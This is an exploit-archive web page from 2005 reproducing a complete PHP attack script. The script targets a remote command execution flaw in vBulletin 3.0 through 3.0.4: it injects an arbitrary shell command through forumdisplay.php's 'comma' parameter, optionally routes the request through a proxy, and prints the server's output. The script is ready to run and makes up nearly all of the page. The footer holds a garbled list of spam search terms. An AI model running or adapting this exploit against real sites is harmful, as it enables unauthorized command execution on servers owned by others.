about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , vBulletin 3.x "forumdisplay.php" Remote Code Execution Exploit



2005-02-15 vBulletin 3.x "forumdisplay.php" Remote Code Execution Exploit
#!D:\phpdev\php\php
<?php
/**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must
set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be an
visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when
you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
# 
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
# 
**************************************************************/

if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB
al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid>
<command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex:
http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: 'ls
-la')\n";
echo "[proxy] optional proxy url (ex:
http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls
-al\"";

exit;
}

if ($argv[4])
$proxy = $argv[4];



$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo
_START_`.`'.$command.'`.`echo _END_`."';

$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, '_START_')+7);
$res = substr($res,0, strpos($res, '_END_'));
echo $res;


?>
securitydot.net - 2005-02-15

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 03:58:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.aijiam www.yqsmsj coppercn.c OpenSSH iChat& www.eastad lo13l www.aijiam indian sex Jaanbaaz hillary du boonex.htm index.php? net cafe s WTS boonex.htm Video sek www.89.sex news+for+c Phonoretic WWW.WOLD.S ttp://shop s0.003 camelclips Dudhwali.c www.santak salma 52cpp.com cart.php 200 /compo Www.xxx.co uiik;kk www.santak news for c 52cpp.com www.ten.co jinzhou.58 imaige sex www.worlds www.movies Invision B www.szaixi hi.baidu.c (ERROR:127 global ann Linux 2.6. phpBB por fanmaza 365Sex.Com LIVE JASMI